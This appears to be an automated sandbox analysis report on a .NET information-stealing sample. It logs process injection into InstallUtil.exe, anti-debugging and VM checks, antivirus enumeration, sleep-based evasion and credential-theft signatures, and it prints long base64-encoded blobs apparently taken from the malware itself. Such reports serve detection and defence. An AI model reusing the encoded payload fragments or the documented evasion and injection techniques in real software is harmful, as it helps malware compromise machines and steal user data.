'H4sIAAAAAAAEADWR4YqjMBSFX0UxkVGSoqEMSN1gaQsmIKUgxF/RQsoGDJ2CKEbEZ990yzzA+e53zv2TPFnO/Kt/M2xgvrDtRd1V8CBcyF49W/sXbr42aKGEDgq2X7NXAW26ITBVhMrblGM57SAYM1zPYRTbjGwLIu3Ey84ioqbZo0t4kvrgbYY2dI+e8jWTwgBxHwKsNL1IHRNZ6bqaQoySztvSWIAlLoHOsBwVlH3m8rxU45vbeS6ftKOBm85sleeiHXkDEoTjKUyLJW6A3ZXAeaCPW1rYjgCdvu950iKs9ghX07G855n9cAx2LD82qWjLN4s24MQx6A2RJDvFy2UtlnYtbF9XY3e+TqF/zWmpfrjbjZ0jP/fZna80eaVoD57tFyXK5+fHwrEQrkc5E7WmWNo+ENEsOsuQOrpOQ4a358F1D5YiZVC+3dfM227OAbruOF6KX+dAN2o0rk/ngdcs2iTAdAjcHvPlOodWdrQGFsHWxHDrAyKHg9ueknd+Sw7CcSPg8vV6EI8lIMVyPP/+BCShbaYKboaXW8+hbD5u3cRq8AyEfN/7v7FuQB6etp8dLD4ccc8di3RCatU7VqkM79ueivsEYJFUbq9qjUdWX+d9FO9DW3wfS5Voj32zqGLcPv4B5d5bLIACAAA='
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.csBase64 encoded string: 'H4sIAAAAAAAEAOy9W2/jONcu+FcimBYsQRQgOS50IMFQ3xlCROfS5gUt2TBKsQBHSVAxYgj87fMsknJS/Xa/mD29sWcw+C6CKoXiaR2edeCi8lBmTw9DLhcvIeP87BfCb7qJz9MX1jzlPt+Uxf6lDPwfarM/yZX8lYfi0vvZnOeNqPH7pKtUvwney7yS5bUZHoYjj/Ng17G9VEH2ugibuzgJXsuENyKIXnMupMr9pOsa0W+y2Y6t7/KNn/6c87X2xURw8a6DYKXmXOqz0ouuWfce37FQZQtP/cjz46mcybc2bZgOxOWFry8vfpZ2ITvVG7FRfjPP/WyD9qCd730+trNj02+qiSj29zH338ukOuVp3Ochf5mk7P7B4zyfVa95J0oxyLT1qhM/803Pj+vyuu3jTVPGunkT+vghOV/8eWpKGWSLPj/uDoN8lXz/zDfrz47/8/xydfwc/ONiOZP/NF7Q502yPNn5Fh3ztRYJ6/hd3x0Zz/kuSoOu1QxNxB+20Z7MWu5/LNi+FJusV/zwzrmMyhz7WVVa5uquLzgvu73C7wpdBAsW8rty4H48l7+45i870PfnrPInnvrFc1HwLliXXcPkie+W+X7ab/iyT5qTLg4TAd6+e9tfpc78kles5s0H5CGRedXKM4N8HEoRBo9qHvl6tZ/oPLhL/OBVpXyTz5sfRr4wH+Qli3W8EZytJ57/WWq1htD8KAv1HiesaOc8qzX6J5WQOQ923lEtvGyrvX3IE/ZL6r14GJpJrmNfddsWcqZkp1Zxkt3HCf+RD/uu96tVmR7WiS9TzN/Em+xd5Pw+KXgCce92nbosi8PdxGO9SptMnIJJEvIQ86/6Tp3yQvrY1xsP2WXLKw5avpZ8X8gv+i95sc8W6fYd65U7j12rYt9Bvn4sBr9RZ5LvRqlwu8ixh7jz37m/fZFY/67YCx7wX1h/s/O3b5jfL1f7S6SDLO62WT/47aKIucj3a+w/6zUP8o79gjS8cBZUZX58VsN+I3KVvBeyVx4X4pxNSg8TJqwste8Tv3v8uj75i51XNbthf3lJwO+CXxchbwVb81j7BegX7fy9EoH/LpOggZx9yrxR+Pddoj/XspJD9VyfMwgVe1/4DO9XfjuPPyN9uKtPgS+ThtW58qU+SvDz+/ozyYO18ire5pyVfnMRp+0vmXAxKQ5aJocL6ObzqxK7LuCqCIr6tL30YRPInF2W3t6PWXCVw74p8y/+gz8izqOdmz+DPD/FOSvKlK31icuyOzbJsP8F+dGS+vPKz/Poh9DKF1c2za/Y/9C8A08+Jun2BfRb89Welwmbgg5hr/ftpJD8gQk/7riRn3aTvemE+5xtk+/8b7/rv/6N/wvuAU+4/8n4XrTFHvhXlSoMFrHXiHYTTBaEl0kwz0Ml8k0A/BS1SoLLMNBzxhK2L4CnvaTnNA6k32jsL7wf/Js87VL2H3jNr1z2XrBUQPTEz645a/x8OIB02y/5TZvPJfDowP8Rj/rSi7PFP/Uvqs9lUSUH4A/wxeCP5NmF86CVHY9y9H9gGDf3r1vYB35WkxL69o/rKcRG+/EiTP8Zb9H+Dv1I8mB/qk9Gv6QM2aPsms03PPoE/aU6q5Uq9rvwn+bzOfA6LhIP8sb+cf1v0O9UY77W+8f5Xncpfwb+bfN/wv+QNbmxD/F7edq+Qj/b/J/He+/D6rkvms+qaLJ/pJfPJ8KL17T+/FQR/mx1ergTA8xIroJJp16hE9AR1j94TQn5/lx6jR8PMnn55/1eoJXv0N/mAeP1/2zPnvMzB97E/0zfooI9PmaEK8DH5p/sbT7fws5Uz+rEJ2Q/co+X9YYL7Sm/5usyT4M+hj1uvWDCrX03++nPRv92sJcX6EPXe07fOj/suiPo4q9In3rff+kT9bTz/FfYsQL6sSP9qoNslQzHEvqaMDy3G8VgR4veh/5BX0nf2nxr/J2cHfPyef08nJbvYb6sNYv+5+d/fv7n5//8j1YsM/9P6DmMp/8fWNP//PzPz/9ffpQOD9+fwwOL0pIxhJ1sqYdmqrttnQxZzc+RynlUtizipXmXQR+bW195js49N/3v0L+Brq70cJjGHkIF9G+96Cz5bZ7s+zrUVVF/pf1IYPyF6c/8Qoey1lzW8VzVuRep0o94zKIfZRifNFNad1Ed+/iZ/7anBO3PWNtKd8dpnG5rnqga8UOtMD7675YsavSwXml2BJ7wmqOfwM/kN9pwrB94w32zvp0X1Zj/Df1X2P8z5kd/at/WIlV1jf0LP7pnLJqadYfx7Pse6xP+9aMT+l/KUJ6wviXhWXwGfZmqhaUvtb9jfIbxMQb6hNn3vdH+Q9BH6kFo8O62vhz9QX/V0v4ZC279u+yvPP8n+lD/uVtf9tf+8SY6a4yvWDTHs8DPgPWjLXDjKkNDTfITStBXYPxsqnPf8I/oU9r9JVa+MshXNY03/NZ/919kVYzy+v334eN/l+/O/Pv2x2eAGPD2+8jsj+iH9cUr0C/A+rB/wSMhWRRgfZmRv06a9cG/Nn0XXTRP/nMevGNoAN/SPJfl7/P//Y/hbWz+T/JX/pd90N5zpzslydf/+7jxPz///UcBl1QfPg43Hq6Oq57HHPHxguK3flMRfrwjHlm3c/XMu+y6LNRi+7fjsdP//bmtvrYb8Z9tYQwgj4r6xOoW+C06RTod6SSetqEEdmSXJZ4T4FKO53KQZXyOCuxllrNgXtr3lwn61lzNS2b753hfAvNEF90fNtEy52wrOFct5dzyqIt9rnOG53B/BwyIJmk8Vbp650M8PPhqJvAsgQVYz12L/sDRZRlu5zoMwsH0p/l9zJ+Fh0KdaH2S8cc4ZXwSygD7SYCTmdpEjyU/1JOO7ei5pfWcoyVs0Ld2Tu9fTfugLu/oz5PsLLRQ+qv/sswzYASbY/99zohewVl1ke6BHTyPZg9DlfGUvS189TTx9pqfshfFBPYnAzGPp/2XrYPOwgZ+8UH/9txFJ/3tOV5lH9Hv71/t+2o
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_01
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\Local\378f89546d0e7df2feb0be104b3394406f42b927
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.csCryptographic APIs: 'TransformBlock'
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, FB5.csCryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
                  Source: 3.2.InstallUtil.exe.5980000.10.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.2b4d318.3.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.5c10000.13.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.5c30000.14.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.4351bc8.8.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.2b1c5c4.4.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 3.2.InstallUtil.exe.5950000.9.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                  Source: a9rLzLY498.exeStatic file information: File size 2114048 > 1048576
                  Source: a9rLzLY498.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x104400
                  Source: a9rLzLY498.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs.Net Code: Ir7 System.AppDomain.Load(byte[])
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs.Net Code: Ir7 System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, 342.cs.Net Code: Ir7
                  Source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, nLO.cs.Net Code: h3h
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132CBDA push ds; ret 0_2_0132CBE5
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01329F22 push ecx; ret 0_2_01329F35
                  Source: a9rLzLY498.exeStatic PE information: section name: .Sakut
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.logJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6788Thread sleep count: 1067 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6796Thread sleep count: 731 > 30Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6860Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6772Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1067Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 731Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0133F33A FindFirstFileExW,0_2_0133F33A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: InstallUtil.exe, 00000003.00000002.255023049.0000000005840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareDDH45C5_Win32_VideoControllerZ23_CD8WVideoController120060621000000.000000-0006.1925.5display.infMSBDAKL4WA9CEPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsNA6YT7MU
                  Source: InstallUtil.exe, 00000003.00000002.255023049.0000000005840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                  Source: InstallUtil.exe, 00000003.00000002.255023049.000000000587B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01330D71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01330D71
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01342AB4 GetProcessHeap,0_2_01342AB4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01334DC5 mov ecx, dword ptr fs:[00000030h]0_2_01334DC5
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_013404B5 mov eax, dword ptr fs:[00000030h]0_2_013404B5
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132A6B7 SetUnhandledExceptionFilter,0_2_0132A6B7
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132A230 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0132A230
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_01330D71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_01330D71
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132A555 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0132A555

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 506000Jump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 508000Jump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8D6008Jump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: EnumSystemLocalesW,0_2_01342190
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: EnumSystemLocalesW,0_2_013421DB
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_01342852
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetLocaleInfoW,0_2_013378EC
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_01342301
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: EnumSystemLocalesW,0_2_013373C6
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: EnumSystemLocalesW,0_2_01342276
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetLocaleInfoW,0_2_01342554
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetLocaleInfoW,0_2_01342783
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0134267D
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_01341EEE
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132A01C cpuid 0_2_0132A01C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\a9rLzLY498.exeCode function: 0_2_0132A44F GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0132A44F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 3.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1356a70.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1356a70.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.a9rLzLY498.exe.1320000.0.unpack, type: UNPACKEDPE
